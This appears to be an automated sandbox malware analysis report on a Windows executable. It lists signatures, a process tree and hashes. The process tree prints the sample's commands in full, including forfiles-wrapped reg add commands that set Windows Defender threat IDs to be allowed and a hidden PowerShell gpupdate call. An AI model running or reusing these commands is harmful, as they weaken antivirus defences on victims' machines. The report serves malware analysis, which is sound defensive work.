Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
23/08/2024, 21:15
Static task
static1
Behavioral task
behavioral1
Sample
59a4e7e633e960fabbe9f0199bbe26473b41fe42aa7140c8e1e3213a54c284ae.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
59a4e7e633e960fabbe9f0199bbe26473b41fe42aa7140c8e1e3213a54c284ae.exe
Resource
win10v2004-20240802-en
General
-
Target
59a4e7e633e960fabbe9f0199bbe26473b41fe42aa7140c8e1e3213a54c284ae.exe
-
Size
6.6MB
-
MD5
0e0cd8b1937fa3f67dc1dde165119496
-
SHA1
73af05a4d6926318343177818b59431eb518dde0
-
SHA256
59a4e7e633e960fabbe9f0199bbe26473b41fe42aa7140c8e1e3213a54c284ae
-
SHA512
d77d4524a42cf6fb27ee5d1baf68e03fd3a6dfb34483612616c4d1d885f128b33e3f895302eb0a6bba5c0ed9d9f2cb47e07da67f2e22f51b96e8624687f7f043
-
SSDEEP
98304:BtExeeTPGM9lSxEanjETJb7RBk90+EbQuAjx7T4Pd/ube/VDNt5yVg89C1DL7kTE:oxvc1eBRBkIMNjxQQbUVhtAkFEy/
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 696 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation 59a4e7e633e960fabbe9f0199bbe26473b41fe42aa7140c8e1e3213a54c284ae.exe -
Indirect Command Execution 1 TTPs 5 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 436 forfiles.exe 2332 forfiles.exe 3200 forfiles.exe 3312 forfiles.exe 4708 forfiles.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1108 3384 WerFault.exe 83 -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 59a4e7e633e960fabbe9f0199bbe26473b41fe42aa7140c8e1e3213a54c284ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 696 powershell.exe 696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 696 powershell.exe -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 3384 wrote to memory of 724 3384 59a4e7e633e960fabbe9f0199bbe26473b41fe42aa7140c8e1e3213a54c284ae.exe 86 PID 3384 wrote to memory of 724 3384 59a4e7e633e960fabbe9f0199bbe26473b41fe42aa7140c8e1e3213a54c284ae.exe 86 PID 3384 wrote to memory of 724 3384 59a4e7e633e960fabbe9f0199bbe26473b41fe42aa7140c8e1e3213a54c284ae.exe 86 PID 724 wrote to memory of 436 724 cmd.exe 88 PID 724 wrote to memory of 436 724 cmd.exe 88 PID 724 wrote to memory of 436 724 cmd.exe 88 PID 436 wrote to memory of 2084 436 forfiles.exe 89 PID 436 wrote to memory of 2084 436 forfiles.exe 89 PID 436 wrote to memory of 2084 436 forfiles.exe 89 PID 2084 wrote to memory of 1400 2084 cmd.exe 90 PID 2084 wrote to memory of 1400 2084 cmd.exe 90 PID 2084 wrote to memory of 1400 2084 cmd.exe 90 PID 724 wrote to memory of 2332 724 cmd.exe 92 PID 724 wrote to memory of 2332 724 cmd.exe 92 PID 724 wrote to memory of 2332 724 cmd.exe 92 PID 2332 wrote to memory of 2340 2332 forfiles.exe 93 PID 2332 wrote to memory of 2340 2332 forfiles.exe 93 PID 2332 wrote to memory of 2340 2332 forfiles.exe 93 PID 2340 wrote to memory of 1808 2340 cmd.exe 94 PID 2340 wrote to memory of 1808 2340 cmd.exe 94 PID 2340 wrote to memory of 1808 2340 cmd.exe 94 PID 724 wrote to memory of 3200 724 cmd.exe 95 PID 724 wrote to memory of 3200 724 cmd.exe 95 PID 724 wrote to memory of 3200 724 cmd.exe 95 PID 3200 wrote to memory of 2980 3200 forfiles.exe 96 PID 3200 wrote to memory of 2980 3200 forfiles.exe 96 PID 3200 wrote to memory of 2980 3200 forfiles.exe 96 PID 2980 wrote to memory of 5032 2980 cmd.exe 97 PID 2980 wrote to memory of 5032 2980 cmd.exe 97 PID 2980 wrote to memory of 5032 2980 cmd.exe 97 PID 724 wrote to memory of 3312 724 cmd.exe 98 PID 724 wrote to memory of 3312 724 cmd.exe 98 PID 724 wrote to memory of 3312 724 cmd.exe 98 PID 3312 wrote to memory of 1928 3312 forfiles.exe 99 PID 3312 wrote to memory of 1928 3312 forfiles.exe 99 PID 3312 wrote to memory of 1928 3312 forfiles.exe 99 PID 1928 wrote to memory of 4624 1928 cmd.exe 100 PID 1928 wrote to memory of 4624 1928 cmd.exe 100 PID 1928 wrote to memory of 4624 1928 cmd.exe 100 PID 724 wrote to memory of 4708 724 cmd.exe 101 PID 724 wrote to memory of 4708 724 cmd.exe 101 PID 724 wrote to memory of 4708 724 cmd.exe 101 PID 4708 wrote to memory of 860 4708 forfiles.exe 102 PID 4708 wrote to memory of 860 4708 forfiles.exe 102 PID 4708 wrote to memory of 860 4708 forfiles.exe 102 PID 860 wrote to memory of 696 860 cmd.exe 103 PID 860 wrote to memory of 696 860 cmd.exe 103 PID 860 wrote to memory of 696 860 cmd.exe 103 PID 696 wrote to memory of 4248 696 powershell.exe 104 PID 696 wrote to memory of 4248 696 powershell.exe 104 PID 696 wrote to memory of 4248 696 powershell.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\59a4e7e633e960fabbe9f0199bbe26473b41fe42aa7140c8e1e3213a54c284ae.exe"C:\Users\Admin\AppData\Local\Temp\59a4e7e633e960fabbe9f0199bbe26473b41fe42aa7140c8e1e3213a54c284ae.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:724 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2084 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:1400
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2340 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:1808
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2980 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:5032
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1928 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:4624
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
- System Location Discovery: System Language Discovery
PID:4248
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 6242⤵
- Program crash
PID:1108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3384 -ip 33841⤵PID:980
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82